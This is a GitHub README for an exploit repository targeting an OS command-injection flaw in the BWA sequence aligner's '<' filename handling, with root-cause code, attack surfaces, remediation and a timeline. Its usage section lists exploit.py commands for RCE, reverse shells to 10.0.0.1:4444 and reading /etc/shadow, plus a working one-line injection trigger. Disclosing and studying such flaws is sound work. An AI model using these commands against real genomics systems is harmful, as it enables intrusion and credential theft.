jabir-dev/CVE-2026-BWA-RCE

# CVE-2026-XXXXX: BWA Command Injection (RCE) ## Overview | Field | Value | |-------|-------| | **Product** | BWA (Burrows-Wheeler Aligner) | | **Vendor** | lh3 (Heng Li) | | **Versions** | 0 through 0.7.19 (all versions) | | **Type** | OS Command Injection (CWE-78) | | **CVSS 4.0** | 10.0 Critical | | **Impact** | Remote Code Execution | | **bio.tools** | https://bio.tools/bwa | ## Vulnerability BWA's `kopen()` function in `kopen.c` (lines 286-309) accepts filenames starting with `<` and passes the remainder directly to `/bin/sh -c` for shell execution **without any input sanitization**. // kopen.c:309 execl("/bin/sh", "sh", "-c", p + 1, NULL); // p+1 = user-controlled input ## Impact An attacker controlling filename arguments to BWA can achieve: - **Arbitrary command execution** as the BWA process user - **Credential theft** (environment variables, SSH keys, cloud tokens) - **Arbitrary file read/write/delete** - **Reverse shell** for persistent access - **Data exfiltration** of genomic and system data ## Attack Surfaces 1. **Galaxy Project** workflows with user-uploaded sample names 2. **Nextflow/Snakemake** pipelines with untrusted FASTQ paths 3. **Shared HPC clusters** (university/research environments) 4. **Web-based bioinformatics tools** wrapping BWA 5. **CI/CD genomics pipelines** processing external data ## Usage # Check if target BWA is vulnerable python3 exploit.py --ref reference.fa --mode check # Execute arbitrary command python3 exploit.py --ref reference.fa --mode rce --cmd "id" # Generate reverse shell payloads python3 exploit.py --ref reference.fa --mode revshell --lhost 10.0.0.1 --lport 4444 # Read sensitive files python3 exploit.py --ref reference.fa --mode exfil --files /etc/passwd /etc/shadow ### Quick Manual Test # Create reference echo ">s1" > ref.fa && echo "ACGTACGTACGT" >> ref.fa bwa index ref.fa # Trigger RCE bwa mem ref.fa "< id > /tmp/pwned.txt; echo ACGT; #" cat /tmp/pwned.txt ## Exploitation Results | Test | Status | |------|--------| | Arbitrary command execution | **CONFIRMED** | | Environment variable theft | **CONFIRMED** | | Arbitrary file read (/etc/passwd) | **CONFIRMED** | | SSH key enumeration | **CONFIRMED** | | Crontab access | **CONFIRMED** | | Reverse shell tools detected | **CONFIRMED** | | Data exfiltration (curl/wget) | **CONFIRMED** | ## Root Cause // kopen.c:282-309 const char *p, *q; for (p = fn; *p; ++p) if (!isspace(*p)) break; if (*p == '<') { // filename starts with '<' // ... for (q = p + 1; *q; ++q) if (ispunct(*q) && *q != '.' && *q != '_' && *q != '-' && *q != ':') break; need_shell = (*q != 0); // weak heuristic check // ... if (!need_shell) { argv = cmd2argv(p + 1); execvp(argv[0], argv); // direct exec } else execl("/bin/sh", "sh", "-c", p + 1, NULL); // SHELL INJECTION! } ## Remediation 1. **Remove** the `<` pipe feature entirely, OR 2. **Require** an explicit flag (`--enable-pipe`) to activate it, OR 3. **Sanitize** input by rejecting shell metacharacters in filenames ## Timeline | Date | Event | |------|-------| | 2026-05-30 | Vulnerability discovered | | 2026-05-30 | CVE requested from MITRE (CAN-2026-2030800) | | TBD | CVE ID assigned | | TBD | Vendor notification | | TBD | Public disclosure (90 days after vendor notification) | ## Disclaimer This exploit is provided for **authorized security testing** and **educational purposes** only. Only use on systems you have explicit permission to test. The author is not responsible for any misuse of this tool. ## License MIT